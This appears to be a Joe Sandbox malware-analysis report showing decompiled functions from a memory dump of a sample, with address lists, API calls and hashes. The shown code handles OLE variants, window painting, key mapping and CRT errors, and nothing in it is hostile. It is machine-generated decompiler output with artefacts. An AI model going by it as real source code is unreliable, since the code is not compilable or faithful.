						 *((intOrPtr*)(__ebx + 8)) = E013BCC33(__edi);
						 *((intOrPtr*)(__ebx + 0xc)) = __edx;
						goto L33;
					case 2:
						_push(5);
						_pop(__eax);
						__ecx = __edi;
						 *__ebx = __ax;
						__eax = E013BD6CC(__edi);
						 *((long long*)(__ebx + 8)) = __fp0;
						goto L33;
					case 3:
						_push(8);
						_pop(__eax);
						__ecx = __edi;
						 *__ebx = __ax;
						__eax = E013BC966(__eax, __edi, __edx);
						__eax =  *((intOrPtr*)(__edi + 8));
						_push( *__eax);
						__imp__#2();
						goto L4;
					case 4:
						__eax = 0x200c;
						 *__ebx = __ax;
						__eax = E014102A7(__edi);
						goto L4;
					case 5:
						__eflags = __eax - 6;
						if(__eax == 6) {
							__esi =  *__edi;
						}
						__ecx =  &_v24;
						__eax = E0140FFCC( &_v24, __edx, __fp0, __esi);
						__edi = __imp__#9;
						__esi = __eax;
						_push(__ebx);
						_push( *__edi());
						_push(__ebx);
						__imp__#10();
						__eax =  &_v24;
						_push( &_v24);
						__eax =  *__edi();
						goto L33;
					case 6:
						_push(0x13);
						_pop(__eax);
						__ecx = __edi;
						 *__ebx = __ax;
						__eax = E0142274D(__edi);
						goto L4;
					case 7:
						__eflags = __eax - 8;
						if(__eax == 8) {
							__esi =  *__edi;
						}
						__eflags = __esi;
						if(__esi != 0) {
							_push(__esi);
							_push(__ebx);
							__imp__#10();
						}
						goto L33;
					case 8:
						_push(0xb);
						_pop(_t27);
						 *__ecx = _t27;
						 *((short*)(__ecx + 8)) = ((E013BBC23(_t37) ^ 0x00000001) & 0x000000ff) - 1;
						goto L33;
					case 9:
						__ecx = __edi;
						__eax = E013CBB63(__ecx, 0x29);
						__eflags = __al;
						if(__al == 0) {
							__eax = E013CBB63(__ecx, 0x2a);
							__eflags = __al;
							if(__al != 0) {
								0 = 1;
								 *__ebx = __ax;
							}
						} else {
							_push(0xa);
							_pop(__eax);
							 *__ebx = __ax;
							 *((intOrPtr*)(__ebx + 8)) = 0x80020004;
						}
						goto L33;
					case 0xa:
						__eax = 0x2011;
						 *__ebx = __ax;
						__eax = E01410417(__ebx, __eflags, __edi);
						L4:
						 *((intOrPtr*)(__ebx + 8)) = __eax;
						goto L33;
					case 0xb:
						_push(0x24);
						_pop(__eax);
						_push(0x28);
						 *__ebx = __ax;
						__eax = E013D01FB(__esi, __eflags);
						__eflags =  *((intOrPtr*)(__edi + 0xc)) - 0xc;
						_pop(__ecx);
						if( *((intOrPtr*)(__edi + 0xc)) == 0xc) {
							__esi =  *__edi;
						}
						__ecx = __eax;
						__eax = E014104F4(__eax, __esi);
						goto L25;
					case 0xc:
						_push(0x24);
						_pop(__eax);
						_push(0x28);
						 *__ebx = __ax;
						__eax = E013D01FB(__esi, __eflags);
						__eflags =  *((intOrPtr*)(__edi + 0xc)) - 0xd;
						_pop(__ecx);
						if( *((intOrPtr*)(__edi + 0xc)) == 0xd) {
							__ecx =  *__edi;
							__esi =  *((intOrPtr*)( *__edi + 0x10));
						}
						__ecx = __eax;
						__eax = E014104BD(__eax, __esi);
						goto L25;
					case 0xd:
						_push(0x24);
						_pop(__eax);
						_push(0x28);
						 *__ebx = __ax;
						__eax = E013D01FB(__esi, __eflags);
						_pop(__ecx);
						__esi = __eax;
						__ecx = __edi;
						 &_v24 = E014219AA(__edi,  &_v24);
						__ecx = __esi;
						__eax = E01410479(__esi, __eflags, __eax);
						__ecx =  &_v24;
						 *((intOrPtr*)(__ebx + 0xc)) = __eax;
						__eax = E013B774C( &_v24);
						goto L33;
					case 0xe:
						_push(0x24);
						_pop(__eax);
						_push(0x28);
						 *__ebx = __ax;
						__eax = E013D01FB(__esi, __eflags);
						__eflags =  *((intOrPtr*)(__edi + 0xc)) - 0xf;
						_pop(__ecx);
						if( *((intOrPtr*)(__edi + 0xc)) == 0xf) {
							__esi =  *__edi;
						}
						__ecx = __eax;
						__eax = E01410536(__eax, __esi);
						L25:
						 *((intOrPtr*)(__ebx + 0xc)) = __eax;
						goto L33;
				}
			}

0x0140ffd5
0x0140ffd8
0x0140ffe3
0x0140ffe6
0x0140ffec
0x0140ffec
0x0140fff2
0x014101c3
0x014101c7
0x014101c7
0x0140fff8
0x00000000
0x0141001c
0x0141001e
0x0141001f
0x01410021
0x01410024
0x00000000
0x00000000
0x01410046
0x01410048
0x01410049
0x0141004b
0x01410053
0x01410056
0x00000000
0x00000000
0x01410031
0x01410033
0x01410034
0x01410036
0x01410039
0x0141003e
0x00000000
0x00000000
0x0141006d
0x0141006f
0x01410070
0x01410072
0x01410075
0x0141007a
0x0141007d
0x0141007f
0x00000000
0x00000000
0x01410087
0x0141008d
0x01410090
0x00000000
0x00000000
0x014100b3
0x014100b6
0x014100b8
0x014100b8
0x014100bb
0x014100be
0x014100c3
0x014100c9
0x014100cb
0x014100ce
0x014100cf
0x014100d0
0x014100d6
0x014100d9
0x014100da
0x00000000
0x00000000
0x0141005e
0x01410060
0x01410061
0x01410063
0x01410066
0x00000000
0x00000000
0x01410097
0x0141009a
0x0141009c
0x0141009c
0x0141009e
0x014100a0
0x014100a6
0x014100a7
0x014100a8
0x014100a8
0x00000000
0x00000000
0x0140ffff
0x01410001
0x01410004
0x01410013
0x00000000
0x00000000
0x014100e3
0x014100e5
0x014100ea
0x014100ec
0x01410102
0x01410107
0x01410109
0x01410111
0x01410112
0x01410112
0x014100ee
0x014100ee
0x014100f0
0x014100f1
0x014100f4
0x014100f4
0x00000000
0x00000000
0x0141011a
0x01410120
0x01410123
0x01410029
0x01410029
0x00000000
0x00000000
0x0141012d
0x0141012f
0x01410130
0x01410132
0x01410135
0x0141013a
0x0141013e
0x0141013f
0x01410141
0x01410141
0x01410144
0x01410146
0x00000000
0x00000000
0x01410170
0x01410172
0x01410173
0x01410175
0x01410178
0x0141017d
0x01410181
0x01410182
0x01410184
0x01410186
0x01410186
0x0141018a
0x0141018c
0x00000000
0x00000000
0x01410193
0x01410195
0x01410196
0x01410198
0x0141019b
0x014101a0
0x014101a1
0x014101a3
0x014101a9
0x014101af
0x014101b1
0x014101b6
0x014101b9
0x014101bc
0x00000000
0x00000000
0x01410150
0x01410152
0x01410153
0x01410155
0x01410158
0x0141015d
0x01410161
0x01410162
0x01410164
0x01410164
0x01410167
0x01410169
0x0141014b
0x0141014b
0x00000000
0x00000000

APIs

VariantInit.OLEAUT32(00000035), ref: 0140FFD8
SysAllocString.OLEAUT32(00000000), ref: 0141007F
VariantCopy.OLEAUT32(01410283,00000000), ref: 014100A8
VariantClear.OLEAUT32(01410283), ref: 014100CC
VariantCopy.OLEAUT32(01410283,00000000), ref: 014100D0
VariantClear.OLEAUT32(?), ref: 014100DA

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: a6566e61b262bf7f68f4aa9344a2bd6d301807ec6221783b0537217a100fae61
Instruction ID: f0dbb10ceb980d7b22415de625a8a60aa83a846141ed92e018ce74ea3505e073
Opcode Fuzzy Hash: a6566e61b262bf7f68f4aa9344a2bd6d301807ec6221783b0537217a100fae61
Instruction Fuzzy Hash: 51510635640311ABCF20AF68E8C4B69B7A4EF56710F14545BF905DF2B8EBB49880CB96

Uniqueness

Uniqueness Score: -1.00%

Function 013B1A55, Relevance: 9.1, APIs: 6, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E013B1A55(intOrPtr __fp0, intOrPtr _a4) {
				struct tagPAINTSTRUCT _v68;
				struct tagRECT _v84;
				struct tagPOINT _v92;
				struct HWND__** _v100;
				struct HWND__** _v129;
				void* __edi;
				void* __esi;
				signed int _t31;
				struct HWND__** _t37;
				struct HWND__** _t47;
				struct HWND__* _t48;
				void* _t54;
				struct HWND__** _t58;
				struct HWND__* _t60;
				intOrPtr _t63;
				struct HDC__* _t66;
				struct HWND__* _t69;
				intOrPtr _t82;

				_t82 = __fp0;
				_t31 = E013B23E1(0x14828d0, _a4);
				_t63 =  *0x1482930; // 0x0
				_t58 =  *( *(_t63 + _t31 * 4));
				_v100 = _t58;
				_t69 = _t58[0x72];
				_t66 = BeginPaint( *_t58,  &(_v84.bottom));
				while(_t69 != 0) {
					_t37 =  *(_t69 + 8);
					if((_t37[0x24] & 0x00000010) == 0 || _t37[0x24] != 0xff) {
						if((_t37[0x24] & 0x000000ff) == _t58[0x64]) {
							goto L4;
						}
					} else {
						L4:
						 *0x1482988 =  *0x1482988 & 0x00000000;
						 *0x1482984 =  *0x1482984 & 0x00000000;
						 *0x1482994 =  *0x1482994 | 0xffffffff;
						 *0x1482998 =  *0x1482998 | 0xffffffff;
						 *0x148298c = 0;
						 *0x1482990 = 1;
						GetWindowRect( *( *(_t69 + 8)),  &_v84);
						_v92.x = _v84.left;
						_v92.y = _v84.top;
						ScreenToClient( *_t58,  &_v92);
						SetViewportOrgEx(_t66, _v92, _v92.y, 0);
						_t47 =  *(_t69 + 8);
						_t60 = _t47[0x12];
						_t48 = _t47[0x13];
						if(_t60 >= 0) {
							if(_t48 != 0xffffffff) {
								goto L16;
							} else {
								_t48 = _t60;
								goto L5;
							}
							L17:
						} else {
							L5:
							if(_t48 != 0xffffffff || _t60 >= 0) {
								L16:
								E013B1E82(_t66, _t69, _t66, _t48, _t60, 0, 1);
								Rectangle(_t66, 0, 0, ( *(_t69 + 8))[0x23], ( *(_t69 + 8))[0x23]);
								E013B1E0E(_t66, _t60);
							}
						}
						_t54 = E013B1CD3(_t82, _t66, _t69);
						E013B1B82(_t66, _t69);
						if(_t54 != 0) {
							_push(_t69);
							_push(_t66);
							E01448EC5(_t66);
						}
						_t58 = _v129;
					}
					_t69 = _t69->i;
				}
				return EndPaint( *_t58,  &_v68);
				goto L17;
			}

0x013b1a55
0x013b1a69
0x013b1a6e
0x013b1a77
0x013b1a7e
0x013b1a84
0x013b1a90
0x013b1a92
0x013b1a9a
0x013b1aa4
0x013f2e34
0x00000000
0x013f2e3a
0x013b1ab7
0x013b1ab7
0x013b1ab7
0x013b1ac2
0x013b1ac9
0x013b1ad0
0x013b1ad7
0x013b1ade
0x013b1aee
0x013b1af8
0x013b1b00
0x013b1b0b
0x013b1b1c
0x013b1b22
0x013b1b25
0x013b1b28
0x013b1b2d
0x013f2e42
0x00000000
0x013f2e44
0x013f2e44
0x00000000
0x013f2e44
0x00000000
0x013b1b33
0x013b1b33
0x013b1b36
0x013f2e4b
0x013f2e52
0x013f2e6f
0x013f2e77
0x013f2e77
0x013b1b36
0x013b1b46
0x013b1b4f
0x013b1b56
0x013b1b79
0x013b1b7a
0x013b1b7b
0x013b1b7b
0x013b1b58
0x013b1b58
0x013b1b5c
0x013b1b5c
0x013b1b76
0x00000000

APIs

Part of subcall function 013B23E1: GetWindowLongW.USER32(00000000,000000EB), ref: 013B23F2

BeginPaint.USER32(?,?,?), ref: 013B1A8A
GetWindowRect.USER32 ref: 013B1AEE
ScreenToClient.USER32 ref: 013B1B0B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 013B1B1C
EndPaint.USER32(?,?,?,?,?), ref: 013B1B6A
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 013F2E6F

Part of subcall function 013B1B82: BeginPath.GDI32(00000000), ref: 013B1BA0

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: b8f682f63cda7d2f83a23f4a6a7836211fb422dc29900974177cf394e386e110
Instruction ID: 2d84ebefca46015ffaefef5cb660861a6dbf4abee65a95684fbab79763b85a68
Opcode Fuzzy Hash: b8f682f63cda7d2f83a23f4a6a7836211fb422dc29900974177cf394e386e110
Instruction Fuzzy Hash: AE41DF306012019FD722DF18D8D4FBB7BE8EB55328F14026DFAA8876B1E7709944DB61

Uniqueness

Uniqueness Score: -1.00%

Function 014487E3, Relevance: 9.1, APIs: 6, Instructions: 104
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E014487E3(intOrPtr _a4, int _a8) {
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t50;
				struct HWND__** _t52;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HWND__** _t60;
				int _t62;
				signed int _t63;
				struct HWND__** _t64;
				struct HWND__** _t65;
				intOrPtr _t66;
				signed char _t68;
				intOrPtr _t69;
				signed int _t70;
				void* _t72;
				void* _t82;
				void* _t83;
				void* _t91;

				_t62 = _a8;
				_t69 = _a4;
				_t70 = 3;
				_t66 =  *((intOrPtr*)(_t69 + 4));
				_a4 = _t66;
				if( *(_t69 + 0x190) == _t62) {
					L15:
					_t83 =  *0x1482954 - _t70; // 0x2
					if(_t83 < 0) {
						L25:
						return SendMessageW( *(_t69 + 0x188), 0x130c, _t62, 0);
					} else {
						goto L16;
					}
					do {
						L16:
						_t42 =  *0x1482944; // 0x19b5930
						_t64 =  *( *(_t42 + _t70 * 4));
						if(_t64 != 0 && _t64[1] == _t66 && _t64[0x24] != 0xb && (_t64[0x24] & 0x000000ff) ==  *(_t69 + 0x190) && (_t64[0x24] & 0x00000020) == 0) {
							ShowWindow( *_t64, 0);
							_t46 =  *0x1482944; // 0x19b5930
							ShowWindow( *( *( *(_t46 + _t70 * 4))), 4);
							_t50 =  *0x1482944; // 0x19b5930
							_t52 =  *( *(_t50 + _t70 * 4));
							if((_t52[0x24] & 0x00000040) != 0 && _t52[0x24] == 0x1a) {
								EnableWindow( *_t52, 1);
							}
						}
						_t66 = _a4;
						_t70 = _t70 + 1;
						_t91 = _t70 -  *0x1482954; // 0x2
					} while (_t91 <= 0);
					goto L25;
				}
				_t63 = _t70;
				_t72 =  *0x1482954 - _t70; // 0x2
				if(_t72 < 0) {
					L14:
					_t62 = _a8;
					 *(_t69 + 0x190) = _t62;
					goto L15;
				} else {
					goto L2;
				}
				do {
					L2:
					_t54 =  *0x1482944; // 0x19b5930
					_t65 =  *( *(_t54 + _t63 * 4));
					if(_t65 != 0 && _t65[1] == _t66) {
						if(_t65[0x24] != 0xb) {
							_t68 = _t65[0x24];
							if((_t68 & 0x000000ff) ==  *(_t69 + 0x190) ||  *((char*)(_t69 + 0x198)) != 0 && _t68 != 0xff && _t68 != 0xa) {
								ShowWindow( *_t65, 0);
								_t58 =  *0x1482944; // 0x19b5930
								_t60 =  *( *(_t58 + _t63 * 4));
								if((_t60[0x24] & 0x00000040) != 0 && _t60[0x24] == 0x1a) {
									EnableWindow( *_t60, 0);
								}
							}
						}
						_t66 = _a4;
					}
					_t63 = _t63 + 1;
					_t82 = _t63 -  *0x1482954; // 0x2
				} while (_t82 <= 0);
				goto L14;
			}

0x014487e7
0x014487ec
0x014487f1
0x014487f2
0x014487f5
0x014487fe
0x01448895
0x01448895
0x0144889b
0x01448929
0x01448941
0x00000000
0x00000000
0x00000000
0x014488a1
0x014488a1
0x014488a1
0x014488a9
0x014488ad
0x014488d9
0x014488df
0x014488ed
0x014488f3
0x014488fb
0x01448904
0x01448913
0x01448913
0x01448904
0x01448919
0x0144891c
0x0144891d
0x0144891d
0x00000000
0x014488a1
0x01448804
0x01448806
0x0144880c
0x0144888c
0x0144888c
0x0144888f
0x00000000
0x00000000
0x00000000
0x00000000
0x0144880e
0x0144880e
0x0144880e
0x01448816
0x0144881a
0x0144882a
0x0144882c
0x0144883b
0x01448854
0x0144885a
0x01448862
0x0144886b
0x0144887a
0x0144887a
0x0144886b
0x0144883b
0x01448880
0x01448880
0x01448883
0x01448884
0x01448884
0x00000000

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0140FA1A,00000000,?,?,00000000,?,013F35E0,00000004,00000000,00000000), ref: 01448854
EnableWindow.USER32(?,00000000), ref: 0144887A
ShowWindow.USER32(FFFFFFFF,00000000), ref: 014488D9
ShowWindow.USER32(?,00000004), ref: 014488ED
EnableWindow.USER32(?,00000001), ref: 01448913
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 01448937

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: d2cff367e41bceb5e8fad3ca2084d3b3ba1f0dabe481f37b47aaa8d64b420dbf
Instruction ID: 948a121647d786a16abe418d09792c6573ca2696fa9c1ae3f6c74993ec8fb849
Opcode Fuzzy Hash: d2cff367e41bceb5e8fad3ca2084d3b3ba1f0dabe481f37b47aaa8d64b420dbf
Instruction Fuzzy Hash: B941C338701646AFFB2ACF98E489FA97FA0FB45354F18416EE6084B3B6C371A445CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013E3194, Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E013E3194(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x147d100; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E013E509D(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E013E3684(_t25, _t36, __eflags,  *0x147d100, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E013E3006(_t25, _t31, 0x1481db4);
							E013E2DE8(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E013E2DE8();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E013E2CC3(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x147d100; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E013E509D(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E013E3684(_t27, _t37, __eflags,  *0x147d100, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E013E3006(_t27, _t32, 0x1481db4);
									E013E2DE8(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E013E2DE8();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E013E362E(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E013E362E(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x013e3194
0x013e3194
0x013e3194
0x013e319e
0x013e31a0
0x013e31a5
0x013e31a8
0x013e31b6
0x013e31bd
0x013e31c2
0x013e31c5
0x013e31c8
0x013e31da
0x013e31df
0x013e31e1
0x013e31ec
0x013e31f3
0x013e31f8
0x013e31fb
0x013e31fd
0x00000000
0x00000000
0x00000000
0x00000000
0x013e31e3
0x013e31e3
0x00000000
0x013e31e3
0x013e31ca
0x013e31ca
0x013e31cb
0x013e31cb
0x013e31d0
0x013e320b
0x013e320c
0x013e3212
0x013e3217
0x013e321a
0x013e321b
0x013e321c
0x013e3223
0x013e3225
0x013e3227
0x013e322c
0x013e322f
0x013e323d
0x013e3249
0x013e324c
0x013e324f
0x013e3261
0x013e3266
0x013e3268
0x013e3273
0x013e3279
0x013e3281
0x013e3283
0x00000000
0x00000000
0x00000000
0x00000000
0x013e326a
0x013e326a
0x00000000
0x013e326a
0x013e3251
0x013e3251
0x013e3252
0x013e3252
0x013e3285
0x013e3286
0x013e3286
0x013e3231
0x013e3237
0x013e323b
0x013e328e
0x013e328f
0x013e3295
0x00000000
0x00000000
0x00000000
0x013e323b
0x013e329c
0x013e329c
0x013e31aa
0x013e31b0
0x013e31b4
0x013e31ff
0x013e3200
0x013e320a
0x00000000
0x00000000
0x00000000
0x013e31b4

APIs

GetLastError.KERNEL32(?,?,013D4E03,?,00000002,?,013D59A6,013D6714), ref: 013E3198
_free.LIBCMT ref: 013E31CB
_free.LIBCMT ref: 013E31F3
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,013D6714,00000000), ref: 013E3200
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,013D6714,00000000), ref: 013E320C
_abort.LIBCMT ref: 013E3212

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: f1d36241338ca6d639c3dd22cbe071333f7f99ca2f06a034aa6db6da16fc8f02
Instruction ID: b65a2989d41d88f56c2fc397c9c527b446e27bf93466230784b5b168801fa6bf
Opcode Fuzzy Hash: f1d36241338ca6d639c3dd22cbe071333f7f99ca2f06a034aa6db6da16fc8f02
Instruction Fuzzy Hash: 3FF0D63590473167C233377CAC0CE5B2AE9BFE1668B210418F925932D4EF31C4018510

Uniqueness

Uniqueness Score: -1.00%

Function 0144902C, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0144902C(struct HDC__* _a4, int _a8, int _a12, signed char _a16) {
				void* __esi;
				void* _t19;
				int _t33;
				void* _t35;
				void* _t36;
				int _t37;

				if((_a16 & 0x00000001) != 0) {
					_push(_t36);
					E013B1E82(_t35, _t36, _a4, 0, 0xffffffff, 0, 1);
					_t37 = _a8;
					_t33 = _a12;
					_t7 = _t37 - 2; // -2
					MoveToEx(_a4, _t7, _t33, 0);
					_t9 = _t37 + 3; // 0x3
					LineTo(_a4, _t9, _t33);
					_t11 = _t33 - 2; // -2
					MoveToEx(_a4, _a8, _t11, 0);
					_t14 = _t33 + 3; // 0x3
					LineTo(_a4, _a8, _t14);
					if( *0x148298c != 0) {
						EndPath(_a4);
						 *0x148298c = 0;
					}
					return StrokePath(_a4);
				}
				return _t19;
			}

0x01449033
0x01449036
0x01449042
0x01449047
0x0144904b
0x0144904f
0x01449056
0x0144905d
0x0144906a
0x0144906e
0x01449078
0x0144907e
0x01449088
0x01449093
0x01449098
0x0144909e
0x0144909e
0x00000000
0x014490a8
0x014490af

APIs

Part of subcall function 013B1E82: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 013B1EDC
Part of subcall function 013B1E82: SelectObject.GDI32(?,00000000), ref: 013B1EEB
Part of subcall function 013B1E82: BeginPath.GDI32(?), ref: 013B1F02
Part of subcall function 013B1E82: SelectObject.GDI32(?,00000000), ref: 013B1F2B

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 01449056
LineTo.GDI32(?,00000003,00000000), ref: 0144906A
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 01449078
LineTo.GDI32(?,00000000,00000003), ref: 01449088
EndPath.GDI32(?), ref: 01449098
StrokePath.GDI32(?), ref: 014490A8

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 9208d9ba045ac0a74e6096578fb95b23afe34fc11d9b0de93bf854a1d481ac21
Instruction ID: 4623d36dba3a9391c4f1c6d4bd398f86a15f18ef97fa0bc178cbf9e9565f0f13
Opcode Fuzzy Hash: 9208d9ba045ac0a74e6096578fb95b23afe34fc11d9b0de93bf854a1d481ac21
Instruction Fuzzy Hash: 44111BB640010DBFEF229F94DC88E9A7FADEB18398F048011BE094A164D7729D55EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 013B3700, Relevance: 9.0, APIs: 6, Instructions: 44
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013B3700(intOrPtr* __ecx) {
				intOrPtr _t14;
				int _t20;
				intOrPtr* _t23;

				_t23 = __ecx;
				_t14 = 5;
				 *__ecx = _t14;
				 *((intOrPtr*)(__ecx + 4)) = _t14;
				 *((short*)(__ecx + 8)) = 1;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 4;
				 *((char*)(_t23 + 0x29)) = MapVirtualKeyW(0x5b, 0);
				 *((char*)(_t23 + 0x26)) = MapVirtualKeyW(0x10, 0);
				 *((char*)(_t23 + 0x27)) = MapVirtualKeyW(0xa0, 0);
				 *((char*)(_t23 + 0x28)) = MapVirtualKeyW(0xa1, 0);
				 *((char*)(_t23 + 0x24)) = MapVirtualKeyW(0x11, 0);
				_t20 = MapVirtualKeyW(0x12, 0);
				 *(_t23 + 0x25) = _t20;
				return _t20;
			}

0x013b370b
0x013b370f
0x013b3711
0x013b3713
0x013b3716
0x013b371c
0x013b371f
0x013b3722
0x013b3725
0x013b372a
0x013b3736
0x013b3741
0x013b374c
0x013b3754
0x013b375c
0x013b375f
0x013b3761
0x013b3767

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 013B3731
MapVirtualKeyW.USER32(00000010,00000000), ref: 013B3739
MapVirtualKeyW.USER32(000000A0,00000000), ref: 013B3744
MapVirtualKeyW.USER32(000000A1,00000000), ref: 013B374F
MapVirtualKeyW.USER32(00000011,00000000), ref: 013B3757
MapVirtualKeyW.USER32(00000012,00000000), ref: 013B375F

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: a2b61b855b60a5983b0b5056648b5d97a00841e02376c09bd776d546e742743e
Instruction ID: d2230962f197b39132e4aca5ffcc88ef0bb45ec41cc00f95da572164f135df05
Opcode Fuzzy Hash: a2b61b855b60a5983b0b5056648b5d97a00841e02376c09bd776d546e742743e
Instruction Fuzzy Hash: 38016CB09017597DE3008F5A8C85B52FFA8FF19354F00415B915C47941C7F5A864CBE5
